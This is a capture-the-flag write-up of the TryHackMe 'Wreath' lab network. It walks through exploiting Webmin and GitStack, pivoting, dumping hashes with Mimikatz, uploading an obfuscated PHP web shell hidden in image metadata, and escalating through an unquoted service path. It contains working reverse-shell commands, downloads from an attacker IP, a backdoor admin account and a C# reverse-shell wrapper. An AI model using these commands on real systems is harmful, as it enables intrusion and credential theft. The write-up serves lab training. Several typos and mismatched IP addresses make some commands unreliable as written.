# CTF TryHackMe - Wreath

## Nmap

```bash
sudo nmap -T4 -p 1-15000 -oN inital-network-sweep.log 10.200.188.200
[SNIP...]
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
443/tcp open https syn-ack ttl 63
9090/tcp closed zeus-admin reset ttl 63
10000/tcp open snet-sensor-mgmt syn-ack ttl 63
[SNIP...]
````

Port **80** seems to redirect to **https://thomaswreath.thm**, to properly resolve the DNS, the IP must
be added to the **/etc/hosts file**. The website seems to be a personal CV.

Port **10000** is running *MiniServ 1.890* (Webmin httpd). This version has a remote code execution
vulnerability. Exploits are available on Metasploit and Github (https://github.com/MuirlandOracle/CVE-2019-15107).


## MiniServ Exploit

The eploit can be executed using the following command :

```bash
./CVE-2019-15107.py 10.200.188.200
[SNIP...]
[+] You should now have a reverse shell on the target
```

start a nc listener (**nc -lnvp 53**)

And we are root !

```bash
sh-4.4# whoami
whoami
root
```

## Discovering the new network

To avoid the need to re-exploit the host, we stored a copy of the root user **id_rsa** ssh key on our local machine as key.rsa.

```bash
[root@prod-serv ~]# cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[SNIP...]
-----END OOPENSSHH PRIVATE KEY-----
```

To reconnect with the key we executed ssh -i key.rsa root@10.200.188.200.

We are using **sshuttle** to pivoting (proxy forwarding) :

```bash
sshuttle -r root@10.200.188.200 --ssh-cmd "ssh -i key.rsa" 10.200.188.0/24 -x 10.200.188.200
```

To enumerate the internal network we uploaded a static version of Nmap to the target.

Using python3, ```http.server 80``` and ```curl http://10.50.185.222/nmap-grib --output nmap-grib``` on the compromised webserver. We discovered 2 additional targets on the network

*we exclud our ip, VPN server, and AWS.*

```bash
./nmap-chekn8 -T4 10.200.188.0/24 -vv -sn | grep -v "host down, received no-
response"

[SNIP...]
Nmap scan report for ip-10-200-188-100
Nmap scan report for ip-10-200-188-150
[SNIP...]

```

Proceeded enumeration hosts found in the previous scan for open ports.

```bash
./nmap-chekn8 -T4 -p- 10.200.188.100 10.200.188.150 -vv
[SNIP...]
Nmap scan report for ip-10-200-98-100.eu-west-1.compute.internal (10.200.98.100)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up, received arp-response (-0.20s latency).
All 65535 scanned ports on ip-10-200-98-100.eu-west-1.compute.internal
(10.200.98.100) are filtered because of 65535 no-responses
MAC Address: 02:3A:F2:DB:E3:0D (Unknown)
Nmap scan report for ip-10-200-98-150.eu-west-1.compute.internal (10.200.98.150)
Reason: 65532 no-responses
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 128
3389/tcp open ms-wbt-server syn-ack ttl 128
5985/tcp open wsman syn-ack ttl 128
MAC Address: 02:C2:DD:8E:F1:A9 (Unknown)
[SNIP...]

```

The target **.100** wasn't accessible at this point but **.150** did return few informations.


## Enumeration of 10.200.188.150

When enumerate the web server on http://10.200.188.150 we received an error from Django.

The output of this error, there are 3 expected web directories, navigating to **/registration/login** we got a *GitStack login*.

Searching on **exploit-db** using searchsploit and discovered theses exploits.

```bash
$ searchsploit gitstack
______________________________________________________________________
Exploit Title
______________________________________________________________________
GitStack - Remote Code Execution
GitStack - Unsaniitized Argument Remote Code Execution (Metasploit)
GitStack 2.3.10 - Remote Code Execution
```


## GitStack Exploit

Download the exploit. The exploit needs to be converted to a Linux format by executing ```dos2unix ./43777.py``` and modify the exploit to change the ssh port forward.

```bash
[SNIP...]
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
ip = '<YOUR_IP>:80'

# What command you want to execute
command = "whoami"
[SNIP...]
```

The exploit executed successfully and is running as **nt system** , the administrator user on windows. 

We know that port TCP 3389 is open and may allow us to RDP (Remote Desktop Protocol). To obtain RDP access, we add a user account and add the account to the "Administrator" and "Remote Management Users" groups through the python exploit (change the **command** and running script do this with all the follwing commands)

```
net user grib password123! /add
net localgroup Administrators grib /add
net localgroup "Remote Management Users" grib /add

# To check user group
net user grib
```

We can now, login to RDP with user **grib** and password **password123!** 

We can also use **Evil-winrm** 

To install it ```sudo gem install evil-winrm``` and login with Evil-winrm by executing :


```bash
evil-winrm -u grib -p "password123!" -i 10.200.188.150
```

```
xfreerdp /v:10.200.188.150:3389 /u:grib /p:password123! +clipboard /dynamic-
resolution /drive:/usr/share/windows-resources,share
```

Then, we mounted a share using freerdp, so we can run **Mimikatz** using :

```
\\tsclien\share\mimikatz\x64\mimkat.exe

mimikatz # privilige::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
Domain : GIT-SERV
SysKey : 0841f6354f4b96d21b99345d07b66571
Local SID : S-1-5-21-3335744492-1614955177-2693036043

SAMKey : f4a3c96f814966517ec3554632cf4

RID : 000001f4 (500)
User : Administrator
  Hash NTLM : xxxxxxxxxxxxxxxxxxx
[SNIP...]
User : Thomas
  Hash NTLM : xxxxxxxxxxxxxxxxxxx
```

Using **CrackStation** website to see passwords hashes in plain text.


## Enumerate the .100 target (Thomas Personal PC)

It seems to be Thomas's personal Windows PC.

Using Evil-winrm to proceed to a port scan

```
evil-winrm -u Administrator -H <ADMIN-HASH> -i 10.200.188.150 -s
/opt/Empire/data/module_source/situational_awareness/network/

Invoke-Portscan.ps1
Invoke-Portscan -Hosts 10.200.188.100 -TopPorts 50

[SNIP...]
Hostname : 10.200.98.100
alive : True
openPorts : {80, 3389}
closedPorts : {}
filteredPorts : {445, 443, 110, 21...}
[SNIP...]
```

Need to use Chisel to proxy our connection to the webserver. Using Evil-winrm's to upload : 

```
evil-winrm -u Administrator -H <ADMIN-HASH> -i 10.200.188.150

upload /home/grib/Documents/THM/Wreath/chisel-grib.exe
```

Before using chisel, need to open a port in the firewall to allow chisel forward :

```
netsh advfirewall firewall add rule name="grib-chisel-rule" dir=in action=allow
protocol=tcp localport=4545
```

Then start chisel server with this command on 10.200.188.150 host:

```
.\chisel-grib.exe server -p 4545 --socks5
```

On our kali machine, setup proxychain and start chisel client :

```bash
cat /etc/proxychains.conf
[ProxyList]
socks5 127.0.0.1 1337
```

```bash
./chisel_1.7.6_linux__amd64 client 10.200.188.150:4545 1337:socks
```

In foxyproxy (browser part) add new one

```
name : gitserver
proxy type: socks5
proxy ip : 127.0.0.1
port : 1337
```

Then, with our kali machine, we can go to **http://10.200.188.150**

It seem to be the same site like we discover earlier on the facing webserver. So download the source code from Thomas's private git server : 

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd \GitStack\repositories
*Evil-WinRM* PS C:\Users\Administrator\Documents> download C:\Gitstack\Repositories\Website.git /home/grib/Documents/THM/Wreath
```

Using GitTool (https://github.com/internetwache/GitTools) to retrive information, and read the source code.

Found **index.php** file. Appeared to be a custom coded image uploader, employing a content filter that checks *image file extension* and *image size* then uploaded to **/uploads**

The file extension filter can be exploit with extension bypass by appending a **.php** to an acceptable image name.

Navigated to **/resources**  a basic authentication password window is facing.

Trying to use Thomas's previously compromised password and gained access to the image upload page (username, using thomas).

Now trying to upload a test and access to the picture at http://10.200.188.100/resources/uploads/image-grib.jpeg

Next step is to changed the file name to image-grib.jpeg.php and the website interpreted the file as php !


## Exploit the source code vulnerability

There is an antivirus present on this PC, so we need to obfuscated the php payload with an online php obfuscator.

```php
<?php
	$cmd = $_GET["wreath"];
	if (isset(cmd)){
		echo "<pre>" . shell_exec($cmd) . "</pre>";
	}
	die();
```

After obsucation (our payload passed to bash so need to espace **$**:

```php
<?php \$c0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$c0)){echo
base64_decode('PHByZT4=').shell_exec(\$c0).base64_decode('PC9wcmU+');}die();?>
```

To bypass the image size filter need to inserted the payload into the comment field of the image metadata, using exiftool.

```bash
exiftool -Comment="<?php \$c0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$c0)){echo base64_decode('PHByZT4=').shell_exec(\$c0).base64_decode('PC9wcmU+');}die();?>" image-grib.jpeg.php
```

Then uploaded and call this one with wreath paramaeter to execute command :

```
http://10.200.72.100/resources/uploads/shell-USERNAME.jpeg.php?wreath=systeminfo
```

Upload nc to have a fully reverse shell 

```
http://10.200.188.100/resources/uploads/image-grib.jpeg.php?wreath=powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.50.185.222:8000/nc-grib.exe','C:\windows\temp\nc-grib.exe')"
```

Then execute it (dont forget to start nc listner on port 9002)

```
http://10.200.188.100/resources/uploads/image-grib.jpeg.php?wreath=powershell.exe c:\\windows\\temp\\nc-grib.exe 10.50.185.222 9002 -e cmd.exe
```

## Privilege Escalation

Let's start by looking for non-default service :

```
wmic service get name,displayname, pathname,startmode | findstr /v /i "C:\Windows"
```

Notice that one of the paths does not have quotation marks around it, **SystemExplorerHelpService**

First of all, let's check to see which account the service runs under:

```
sc qc SystemExplorerHelpService
```

Service running as the local system account.

Let's check the permissions on the directory. If we can write to it, we are golden:

```
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"

Access : BUILTIN\Users Allow FullControl
```

We have full control over this directory!!

So, creating a payload *Wrapper.cs* on our kali machine

```
using System;
using System.Diagnostics;

namespace Wrapper{
	class Program{
		static void Main(){

			Process proc = new Process();
			ProcessStartInfo procInfo = new
			ProcessStartInfo("c:\\windows\\temp\\nc-grib.exe",
"10.50.185.222 9003 -e cmd.exe");
			procInfo.CreateNoWindow = true;
			proc.StartInfo = procInfo;
			proc.Start();
		}
	}
}
```

Then compile this one :

```bash
mcs Wrapper.cs
```

Get **Wrapper.exe**

Transfer the Wrapper.exe   file to the target using **impacket SMB Server**

First up, let's download the package:

```bash
sudo git clone https://github.com/SecureAuthCorp/impacket /opt/impacket && cd /opt/impacket && sudo pip3 install .
```

We can now start up a temporary SMB server:

```bash
sudo python3 /opt/impacket/examples/smbserver.py share . -smb2support -username user -password s3cureP@ssword
```

Now, in our reverse shell, we can use this command to authenticate and copy our Wrapper.exe:

```bash
net use \\10.50.185.222\share /USER:user s3cureP@ssword

copy \\10.50.185.222\share\Wrapper.exe %TEMP%\wrapper-grib.exe
```

We then copied it to **system.exe** in **C:\Program Files (x86)\System Explorer\System.exe** and restarted the service to activate the payload and received a reverse shell as nt system .

```
copy %TEMP%\wrapper-grib.exe "C:\Program Files (x86)\System Explorer\System.exe"
```

Let's try stopping the service:

```
sc stop SystemExplorerHelpService
```

Start it! Set up a listener on our kali machine then start the service:

```
sc start SystemExplorerHelpService
```

```bash
nc -lnvp 9003

C:\Windows\system32>whoami
whoami
nt authority\system
```

And we'rrr Root !! :D







